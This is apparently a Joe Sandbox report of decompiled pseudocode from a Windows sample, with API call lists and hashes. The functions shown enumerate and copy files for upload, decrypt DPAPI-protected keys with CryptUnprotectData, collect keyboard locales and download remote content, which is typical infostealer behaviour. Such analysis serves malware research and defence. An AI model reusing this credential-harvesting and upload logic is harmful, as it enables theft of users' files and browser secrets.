Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

FindFirstFileA.KERNEL32(?,?,0040FBE1,0040FBE1,00412134,0040FBE1,?,?,?), ref: 00406281
StrCmpCA.SHLWAPI(?,0040FBF0,?,?,?), ref: 0040629F
StrCmpCA.SHLWAPI(?,0040FBF4,?,?,?), ref: 004062B9

Part of subcall function 0040EAAB: lstrlen.KERNEL32(?,?,0040C841,0040FBE1,0040FBE1,00000000,00000000,?,?,0040D115), ref: 0040EAB1
Part of subcall function 0040EAAB: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EAE3

StrCmpCA.SHLWAPI(?,0040FBE4,0040FBE4,0040FBE4,?,0040FBE1,?,?,?), ref: 004063EE
StrCmpCA.SHLWAPI(?,?,?,?), ref: 0040643F
StrCmpCA.SHLWAPI(00408775,?,?,?), ref: 00406452

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

StrCmpCA.SHLWAPI(?), ref: 00406532
StrCmpCA.SHLWAPI(?), ref: 0040666E

Part of subcall function 0040D800: GetSystemTime.KERNEL32(?,0040FBE1,00000000,?,?,?,?,?,?,?,004031B4,00000014), ref: 0040D825

CopyFileA.KERNEL32(?,?,00000001), ref: 004065B8

Part of subcall function 004058B3: lstrlen.KERNEL32(?), ref: 00405AA9
Part of subcall function 004058B3: lstrlen.KERNEL32(?), ref: 00405AB7

DeleteFileA.KERNEL32(?), ref: 00406642
FindNextFileA.KERNEL32(?,?,?,?,?), ref: 0040673C
FindClose.KERNEL32(?,?,?,?), ref: 0040674D

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$Filelstrlen$Find$lstrcat$CloseCopyDeleteFirstNextSystemTime
String ID:
API String ID: 2507765261-0
Opcode ID: 7bc8a7082d15440bb33fad3386c426acd7ad8c83dc195a977b6901daceea3ce4
Instruction ID: fca51813597213afbaaed59be27043837c1ae2c8aa6722b7d53b74ba6fe0e7b8
Opcode Fuzzy Hash: 7bc8a7082d15440bb33fad3386c426acd7ad8c83dc195a977b6901daceea3ce4
Instruction Fuzzy Hash: E0E16F32D001199BCF10FBA6DD82ADD7775AF04308F45457AF805B31A1EB38AE698F99

Uniqueness

Uniqueness Score: -1.00%

Function 00401010 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 347
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00401010(void* __ecx, void* __eflags, char _a4, char _a16, char _a28, int _a40, char _a44) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				CHAR* _v28;
				char _v32;
				CHAR* _v44;
				char _v56;
				void* _v60;
				CHAR* _v72;
				char _v76;
				char _v88;
				void* _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v224;
				char _v236;
				char _v248;
				char _v260;
				char _v272;
				char _v284;
				char _v296;
				char _v308;
				char _v320;
				char _v332;
				char _v344;
				char _v356;
				char _v368;
				struct _WIN32_FIND_DATAA _v692;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t149;
				void* _t151;
				char _t173;
				void* _t176;
				int _t178;
				int _t180;
				intOrPtr _t188;
				intOrPtr _t217;
				int _t221;
				void* _t230;
				char* _t241;
				intOrPtr _t244;
				void* _t247;
				int _t261;
				void* _t327;
				void* _t332;
				char* _t335;
				char* _t353;
				char* _t374;
				void* _t403;
				void* _t404;
				void* _t405;
				void* _t406;
				void* _t407;
				void* _t408;

				_t409 = __eflags;
				_t327 = 0x40fbe1;
				E0040EA50( &_v56, __eflags, 0x40fbe1);
				E0040EA50( &_v72, __eflags, 0x40fbe1);
				_t149 = E0040D93A( &_v28, 0x1a);
				_pop(_t331);
				_t151 = E0040EB29( &_v56, _t331, _t149,  &_v44, _t409);
				_t353 =  &_v56;
				E0040EAEF(_t151, _t331, _t353);
				E004016EF(_v44);
				E004016EF(_v28);
				_t410 = _a40;
				_t335 = _t353;
				if(_a40 == 0) {
					E0040EAEF(E0040EB29(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29( &_v72, _t331, _t335,  &_v104, __eflags), _t331,  &_v16, __eflags, 0x40fbe4), _t331,  &_a4,  &_v28, __eflags), _t331,  &_v44, __eflags, 0x40fbe4), _t331,  &_a28,  &_v88, __eflags), _t331,  &_v72);
					E004016EF(_v88);
					E004016EF(_v44);
					E004016EF(_v28);
					E004016EF(_v16);
					_t173 = _v104;
				} else {
					E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29( &_v72, _t331, _t335,  &_v88, _t410), _t331,  &_v16, _t410, 0x40fbe4), _t331,  &_a4,  &_v28, _t410), _t331,  &_v44, _t410, "\*.*"), _t331,  &_v72);
					E004016EF(_v44);
					E004016EF(_v28);
					E004016EF(_v16);
					_t173 = _v88;
				}
				E004016EF(_t173);
				_t176 = FindFirstFileA(_v72,  &_v692); // executed
				_v60 = _t176;
				if(_t176 != 0xffffffff) {
					do {
						_t178 =  *0x613784( &(_v692.cFileName), 0x40fbf0);
						__eflags = _t178;
						if(_t178 != 0) {
							__eflags =  *0x613784( &(_v692.cFileName), 0x40fbf4);
							if(__eflags != 0) {
								E0040EA50( &_v44, __eflags, _t327);
								__eflags = _a40;
								if(__eflags == 0) {
									E0040EAEF(E0040EB6B(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29( &_v44, _t331,  &_v56,  &_v344, __eflags), _t331,  &_v224, __eflags, 0x40fbe4), _t331,  &_a4,  &_v296, __eflags), _t331,  &_v200, __eflags, 0x40fbe4), _t331,  &_v116, __eflags,  &(_v692.cFileName)), _t331,  &_v44);
									E004016EF(_v116);
									E004016EF(_v200);
									E004016EF(_v296);
									E004016EF(_v224);
									_t217 = _v344;
								} else {
									_t331 =  &(_v692.cFileName);
									E0040EAEF(E0040EB29(E0040EB6B(E0040EB6B(E0040EB6B(E0040EB29(E0040EB6B(E0040EB29( &_v44,  &(_v692.cFileName),  &_v56,  &_v176, __eflags),  &(_v692.cFileName),  &_v272, __eflags, 0x40fbe4),  &(_v692.cFileName),  &_a4,  &_v152, __eflags), _t331,  &_v320, __eflags, 0x40fbe4), _t331,  &_v368, __eflags,  &(_v692.cFileName)), _t331,  &_v88, __eflags, 0x40fbe4), _t331,  &_a28,  &_v104, __eflags), _t331,  &_v44);
									E004016EF(_v104);
									E004016EF(_v88);
									E004016EF(_v368);
									E004016EF(_v320);
									E004016EF(_v152);
									E004016EF(_v272);
									_t217 = _v176;
								}
								E004016EF(_t217);
								_t404 = _t403 - 0xc;
								E0040EA82( &_v44, _t331, _t404, __eflags);
								_t221 = E0040D910();
								_t403 = _t404 + 0xc;
								__eflags = _t221;
								if(__eflags != 0) {
									E0040EA50( &_v16, __eflags, _t327);
									_t230 = E0040EB6B(E0040EB29(E0040EB6B(E0040EB6B( &_v16, _t331,  &_v164, __eflags,  *0x613144), _t331,  &_v140, __eflags, 0x40fbe4), _t331,  &_a16,  &_v128, __eflags), _t331,  &_v248, __eflags, 0x40fbe4);
									_t374 =  &_v16;
									E0040EAEF(_t230, _t331, _t374);
									E004016EF(_v248);
									E004016EF(_v128);
									E004016EF(_v140);
									E004016EF(_v164);
									__eflags = _a40;
									_push( &(_v692.cFileName));
									_t241 = _t374;
									if(__eflags == 0) {
										E0040EAEF(E0040EB6B(_t241, _t331,  &_v260, __eflags), _t331,  &_v16);
										_t244 = _v260;
									} else {
										E0040EAEF(E0040EB6B(_t241, _t331,  &_v188, __eflags), _t331,  &_v16);
										E004016EF(_v188);
										E0040EAEF(E0040EB29(E0040EB6B( &_v16, _t331,  &_v236, __eflags, 0x40fbe4), _t331,  &_a28,  &_v212, __eflags), _t331,  &_v16);
										E004016EF(_v212);
										_t244 = _v236;
									}
									E004016EF(_t244);
									E0040EA50( &_v28, __eflags, _t327);
									_t247 = E0040D800(_t327,  &_v332, __eflags, 0x1a);
									_pop(_t332);
									E0040EAEF(E0040EB29(E0040EB6B( &_v28, _t332,  &_v308, __eflags,  *0x6133e4), _t332, _t247,  &_v284, __eflags), _t332,  &_v28);
									E004016EF(_v284);
									E004016EF(_v308);
									E004016EF(_v332);
									CopyFileA(_v44, _v28, 1);
									_t405 = _t403 - 0xc;
									E0040EA82( &_v28, _t332, _t405, __eflags);
									_t261 = E00404B20( &_v32,  &_v76);
									_t406 = _t405 + 0xc;
									__eflags = _t261;
									if(__eflags != 0) {
										_push(_v76);
										_push(_v32);
										_t407 = _t406 - 0xc;
										E0040EA82( &_v16, _t332, _t407, __eflags);
										_t408 = _t407 - 0x50;
										E00401581( &_a44, _t408);
										_push( &_v356);
										E00403721(_t332, __eflags);
										_t406 = _t408 + 0x68;
										E004016EF(_v356);
									}
									DeleteFileA(_v28);
									E004016EF(_v28);
									_v28 = 0;
									_v20 = 0;
									E004016EF(_v16);
									_v16 = 0;
									_v8 = 0;
									_v92 =  &_v32;
									memset(_v92, 0, 4 << 0);
									_t403 = _t406 + 0xc;
									_t331 = 0;
									E004016EF(0);
									__eflags = 0;
									E004016EF(0);
									_t327 = 0x40fbe1;
								}
								E004016EF(_v44);
							}
						}
						_t180 = FindNextFileA(_v60,  &_v692);
						__eflags = _t180;
					} while (_t180 != 0);
					FindClose(_v60);
					E004016EF(_v56);
					E004016EF(_v72);
					E004016EF(0);
					_t188 = 0;
					__eflags = 0;
					goto L20;
				} else {
					E004016EF(_v72);
					_t188 = _v56;
					L20:
					E004016EF(_t188);
					E004016EF(_a4);
					E004016EF(_a16);
					E004016EF(_a28);
					return E00401562( &_a44);
				}
			}

0x00401010
0x0040101c
0x00401025
0x0040102e
0x00401038
0x0040103f
0x00401046
0x0040104b
0x0040104e
0x00401056
0x0040105e
0x00401063
0x00401067
0x00401069
0x004010fb
0x00401103
0x0040110b
0x00401113
0x0040111b
0x00401120
0x0040106b
0x0040109e
0x004010a6
0x004010ae
0x004010b6
0x004010bb
0x004010bb
0x00401123
0x00401132
0x00401138
0x0040113e
0x00401150
0x0040115c
0x00401162
0x00401164
0x0040117c
0x0040117e
0x00401188
0x0040118d
0x00401194
0x00401290
0x00401298
0x004012a3
0x004012ae
0x004012b9
0x004012be
0x0040119a
0x004011a0
0x004011fc
0x00401204
0x0040120c
0x00401217
0x00401222
0x0040122d
0x00401238
0x0040123d
0x0040123d
0x004012c4
0x004012c9
0x004012d1
0x004012d6
0x004012db
0x004012de
0x004012e0
0x004012ea
0x00401326
0x0040132b
0x0040132e
0x00401339
0x00401341
0x0040134c
0x00401357
0x0040135c
0x00401366
0x00401367
0x00401369
0x004013d3
0x004013d8
0x0040136b
0x00401379
0x00401384
0x004013ad
0x004013b8
0x004013bd
0x004013bd
0x004013de
0x004013e7
0x004013f4
0x004013f9
0x0040141e
0x00401429
0x00401434
0x0040143f
0x0040144c
0x00401452
0x00401459
0x00401464
0x00401469
0x0040146c
0x0040146e
0x00401470
0x00401476
0x00401479
0x0040147e
0x00401483
0x0040148b
0x00401496
0x00401497
0x004014a2
0x004014a5
0x004014a5
0x004014ad
0x004014b6
0x004014c0
0x004014c3
0x004014c6
0x004014ce
0x004014d1
0x004014d4
0x004014e1
0x004014e1
0x004014e1
0x004014e5
0x004014ea
0x004014ec
0x004014f1
0x004014f1
0x004014f9
0x004014f9
0x0040117e
0x00401508
0x0040150e
0x0040150e
0x00401519
0x00401522
0x0040152a
0x00401531
0x00401536
0x00401536
0x00000000
0x00401140
0x00401143
0x00401148
0x00401538
0x00401538
0x00401540
0x00401548
0x00401550
0x00401561
0x00401561

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040D93A: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,0040FBE1,?), ref: 0040D96B

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

FindFirstFileA.KERNEL32(?,?,0040FBE4,0040FBE4,0040FBE1,0040FBE1,?,?,?), ref: 00401132

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

StrCmpCA.SHLWAPI(?,0040FBF0,?,?), ref: 0040115C
StrCmpCA.SHLWAPI(?,0040FBF4,?,?), ref: 00401176
CopyFileA.KERNEL32(?,?,00000001), ref: 0040144C

Part of subcall function 0040EA82: lstrcpy.KERNEL32(00000000,?), ref: 0040EAA1

Part of subcall function 00404B20: CreateFileA.KERNEL32(h|@,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,00407C68,?), ref: 00404B3B
Part of subcall function 00404B20: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00407C68,?), ref: 00404B52
Part of subcall function 00404B20: LocalAlloc.KERNEL32(00000040,?,?,?,?,00407C68,?), ref: 00404B69
Part of subcall function 00404B20: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00407C68,?), ref: 00404B80
Part of subcall function 00404B20: FindCloseChangeNotification.KERNEL32(?,?,?,?,00407C68,?), ref: 00404BA8

DeleteFileA.KERNEL32(?), ref: 004014AD

Part of subcall function 00403721: lstrlen.KERNEL32(?), ref: 0040377A
Part of subcall function 00403721: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004037C9
Part of subcall function 00403721: StrCmpCA.SHLWAPI(?), ref: 004037DE

FindNextFileA.KERNEL32(?,?,?,?), ref: 00401508
FindClose.KERNEL32(?,?,?), ref: 00401519

Strings

\*.*, xrefs: 0040106B

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$Find$Closelstrcatlstrlen$AllocChangeCopyCreateDeleteFirstFolderInternetLocalNextNotificationOpenPathReadSize
String ID: \*.*
API String ID: 2190286044-1173974218
Opcode ID: a51dd1160227c8be112c71bbe565e6fed5c72d193336e0a552819ab66265f040
Instruction ID: 3d7e9bc47cd54def9d90df52351411b67a4330dca3c6f2d59e4daa4503bef0ff
Opcode Fuzzy Hash: a51dd1160227c8be112c71bbe565e6fed5c72d193336e0a552819ab66265f040
Instruction Fuzzy Hash: 43E1A931D001199BCF10FBA6CC826CDB7B6AF04308F5545BAB505B71A2DB397E5A8F98

Uniqueness

Uniqueness Score: -1.00%

Function 00404CAA Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 112
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00404CAA(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _v28;
				long _v32;
				intOrPtr _v36;
				char _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				char* _t40;
				char* _t41;
				void* _t43;
				intOrPtr _t48;
				long _t52;
				void* _t53;
				char* _t65;
				void* _t67;
				char* _t68;
				void* _t75;
				void* _t76;
				void* _t79;

				_v20 = _v20 & 0x00000000;
				E0040EA50(_t79 - 0xc, __eflags, _a4);
				_t37 = E00404B20( &_v12,  &_v16); // executed
				if(_t37 == 0 || _v12 == 0) {
					L17:
					return _v20;
				} else {
					_t75 = _v16;
					if(_t75 == 0) {
						goto L17;
					}
					_t40 = LocalAlloc(0x40, _t75 + 1); // executed
					_t68 = _t40;
					if(_t68 == 0) {
						goto L17;
					}
					if(_t75 == 0) {
						L7:
						_t41 = StrStrA(_t68,  *0x61304c);
						if(_t41 != 0) {
							_t11 =  &(_t41[0x10]); // 0x10
							_t43 = E00404BBC( &_v16, _t11,  &_v8, E0040D8A8(_t11));
							if(_t43 != 0 && _v8 >= 5) {
								_t76 = _v16;
								__imp__memcmp(_t76, "DPAPI", 5);
								if(_t43 == 0) {
									_v40 = _v8 + 0xfffffffb;
									_v36 = _t76 + 5;
									_t48 =  *0x61368c( &_v40, 0, 0, 0, 0, 0,  &_v32); // executed
									_v24 = _t48;
									if(_t48 != 0) {
										_t52 = _v32;
										_v12 = _t52;
										_t53 = LocalAlloc(0x40, _t52);
										_v16 = _t53;
										if(_t53 != 0) {
											memcpy(_v16, _v28, _v12);
										}
									}
									LocalFree(_v28);
									if(_v24 != 0 && _v12 == 0x20) {
										_v20 = 1;
										E00404C40(_a12, _a8, _v16); // executed
									}
								}
							}
						}
						goto L17;
					} else {
						_t65 = _t68;
						_t67 = _v12 - _t68;
						do {
							 *_t65 =  *((intOrPtr*)(_t67 + _t65));
							_t65 =  &(_t65[1]);
							_t75 = _t75 - 1;
						} while (_t75 != 0);
						goto L7;
					}
				}
			}

0x00404cb0
0x00404cbf
0x00404cca
0x00404cd4
0x00404de3
0x00404dea
0x00404ce4
0x00404ce4
0x00404ce9
0x00000000
0x00000000
0x00404cf5
0x00404cfb
0x00404cff
0x00000000
0x00000000
0x00404d07
0x00404d19
0x00404d20
0x00404d28
0x00404d2e
0x00404d3d
0x00404d45
0x00404d55
0x00404d60
0x00404d6b
0x00404d73
0x00404d88
0x00404d8b
0x00404d91
0x00404d96
0x00404d98
0x00404d9e
0x00404da1
0x00404da7
0x00404dac
0x00404db7
0x00404db7
0x00404dac
0x00404dbc
0x00404dc5
0x00404dd6
0x00404ddd
0x00404de2
0x00404dc5
0x00404d6b
0x00404d45
0x00000000
0x00404d09
0x00404d0c
0x00404d0e
0x00404d10
0x00404d13
0x00404d15
0x00404d16
0x00404d16
0x00000000
0x00404d10
0x00404d07

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 00404B20: CreateFileA.KERNEL32(h|@,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,00407C68,?), ref: 00404B3B
Part of subcall function 00404B20: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00407C68,?), ref: 00404B52
Part of subcall function 00404B20: LocalAlloc.KERNEL32(00000040,?,?,?,?,00407C68,?), ref: 00404B69
Part of subcall function 00404B20: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00407C68,?), ref: 00404B80
Part of subcall function 00404B20: FindCloseChangeNotification.KERNEL32(?,?,?,?,00407C68,?), ref: 00404BA8

LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040FBE1), ref: 00404CF5
StrStrA.SHLWAPI(00000000,?,?,?,?,?,0040FBE1), ref: 00404D20
memcmp.MSVCRT ref: 00404D60
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00404D8B
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,0040FBE1), ref: 00404DA1
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,0040FBE1), ref: 00404DBC

Strings

, xrefs: 00404DC7
DPAPI, xrefs: 00404D5A

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Local$AllocFile$ChangeCloseCreateCryptDataFindFreeNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 939084651-1819349886
Opcode ID: 001ebd81b3db33ece72b2e14d2ed8896a3c7325ffe3610a1de0893da5463f8c8
Instruction ID: 0a3e1c5ec55d8ac5aaea67a9ddd1e0a84c311b8ef67fec84292ddbbb0e2f193f
Opcode Fuzzy Hash: 001ebd81b3db33ece72b2e14d2ed8896a3c7325ffe3610a1de0893da5463f8c8
Instruction Fuzzy Hash: 9F4161B5D00219ABCF11EF95D8846EEBBB5EF84304F14407AEA11B7391D7349B45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D271 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040D271(void* __eflags, char _a4) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v28;
				char _v40;
				char _v52;
				char _v564;
				void* __esi;
				int _t30;
				int _t33;
				char _t41;
				intOrPtr _t44;
				void* _t46;
				void* _t55;
				void* _t56;
				void* _t64;

				_t1 =  &_a4; // 0x412120
				E0040EA50( *_t1, __eflags, 0x40fbe1);
				_v12 = 0;
				_t30 = GetKeyboardLayoutList(0, 0);
				_t56 = LocalAlloc(0x40, _t30 << 2);
				_t33 = GetKeyboardLayoutList(_t30, _t56);
				_v16 = _t33;
				_v8 = 0;
				if(_t33 > 0) {
					do {
						GetLocaleInfoA( *(_t56 + _v8 * 4) & 0x0000ffff, 2,  &_v564, 0x200); // executed
						_t67 = _v12;
						_push( &_v564);
						_t41 = _a4;
						if(_v12 == 0) {
							E0040EAEF(E0040EB6B(_t41, _t55,  &_v40, __eflags), _t55, _a4);
							_t44 = _v40;
						} else {
							E0040EAEF(E0040EB6B(E0040EB6B(_t41, _t55,  &_v52, _t67, " / "), _t55,  &_v28, _t67), _t55, _a4);
							E004016EF(_v28);
							_t44 = _v52;
						}
						E004016EF(_t44);
						_v12 = _v12 + 1;
						_t46 = 0;
						do {
							 *((char*)(_t64 + _t46 - 0x230)) = 0;
							if (_t46 != 0) goto L7;
							_t46 = _t46 + 1;
						} while (_t46 < 0x200);
						_v8 = _v8 + 1;
					} while (_v8 < _v16);
				}
				if(_t56 != 0) {
					LocalFree(_t56);
				}
				_t28 =  &_a4; // 0x412120
				return  *_t28;
			}

0x0040d27c
0x0040d285
0x0040d28e
0x0040d291
0x0040d2a5
0x0040d2a9
0x0040d2af
0x0040d2b2
0x0040d2b7
0x0040d2c2
0x0040d2d4
0x0040d2da
0x0040d2e4
0x0040d2e5
0x0040d2e8
0x0040d31f
0x0040d324
0x0040d2ea
0x0040d302
0x0040d30a
0x0040d30f
0x0040d30f
0x0040d327
0x0040d32c
0x0040d32f
0x0040d331
0x0040d331
0x0040d33b
0x0040d33d
0x0040d33e
0x0040d342
0x0040d348
0x0040d2c2
0x0040d353
0x0040d356
0x0040d356
0x0040d35c
0x0040d363

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

GetKeyboardLayoutList.USER32(00000000,00000000,0040FBE1,00000104,?,00412120), ref: 0040D291
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040D29F
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040D2A9
GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 0040D2D4

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

LocalFree.KERNEL32(00000000), ref: 0040D356

Strings

!A, xrefs: 0040D27C, 0040D35C
/ , xrefs: 0040D2EA

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: !A$ /
API String ID: 507856799-3319605156
Opcode ID: 4dd82d38ae6c9886933fef20a0ad434be156a7ec2bd0ece013937739d0f03ea9
Instruction ID: 16c33c1b347a425d454247989a485e607c962977c3bca95fae1dd4c8b3d91fd2
Opcode Fuzzy Hash: 4dd82d38ae6c9886933fef20a0ad434be156a7ec2bd0ece013937739d0f03ea9
Instruction Fuzzy Hash: D1212D75A00118ABCB00EBA5DDC5ADE77B9FB04344F144476F906F7281D738AE45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403657 Relevance: 10.6, APIs: 7, Instructions: 69
networkmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403657(char* _a4) {
				long _v12;
				char* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void _v1064;
				void* _t29;
				void* _t30;
				void* _t35;
				void* _t41;
				void* _t53;
				void* _t54;

				_v12 = 1;
				_t29 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff); // executed
				_v20 = _t29;
				_t30 = InternetOpenA(0x40fbe1, 0, 0, 0, 0);
				_v32 = _t30;
				_v24 = InternetOpenUrlA(_t30, _a4, 0, 0, 0x4000100, 0);
				_v16 = 0;
				while(_v12 > 0) {
					InternetReadFile(_v24,  &_v1064, 0x400,  &_v12); // executed
					_t35 = 0;
					if(_v12 > 0) {
						do {
							_v36 = _t53 + _t35 - 0x424;
							_v28 = _v16 + _v20;
							_t41 = memcpy(_v28, _v36, 1);
							_t54 = _t54 + 0xc;
							_v16 = _v16 + 1;
							_t35 = _t41 + 1;
						} while (_t35 < _v12);
						continue;
					}
					break;
				}
				InternetCloseHandle(_v24);
				InternetCloseHandle(_v32);
				E004016EF(_a4);
				return _v20;
			}

0x0040366b
0x00403679
0x00403688
0x0040368b
0x0040369c
0x004036a6
0x004036a9
0x004036f7
0x004036c1
0x004036c7
0x004036cc
0x004036ce
0x004036d5
0x004036de
0x004036ec
0x004036ec
0x004036ee
0x004036f1
0x004036f2
0x00000000
0x004036ce
0x00000000
0x004036cc
0x004036ff
0x00403708
0x00403711
0x00403720

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?), ref: 00403672
RtlAllocateHeap.NTDLL(00000000), ref: 00403679
InternetOpenA.WININET(0040FBE1,00000000,00000000,00000000,00000000), ref: 0040368B
InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 004036A0
InternetReadFile.WININET(?,?,00000400,00000001), ref: 004036C1
InternetCloseHandle.WININET(?), ref: 004036FF
InternetCloseHandle.WININET(?), ref: 00403708

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
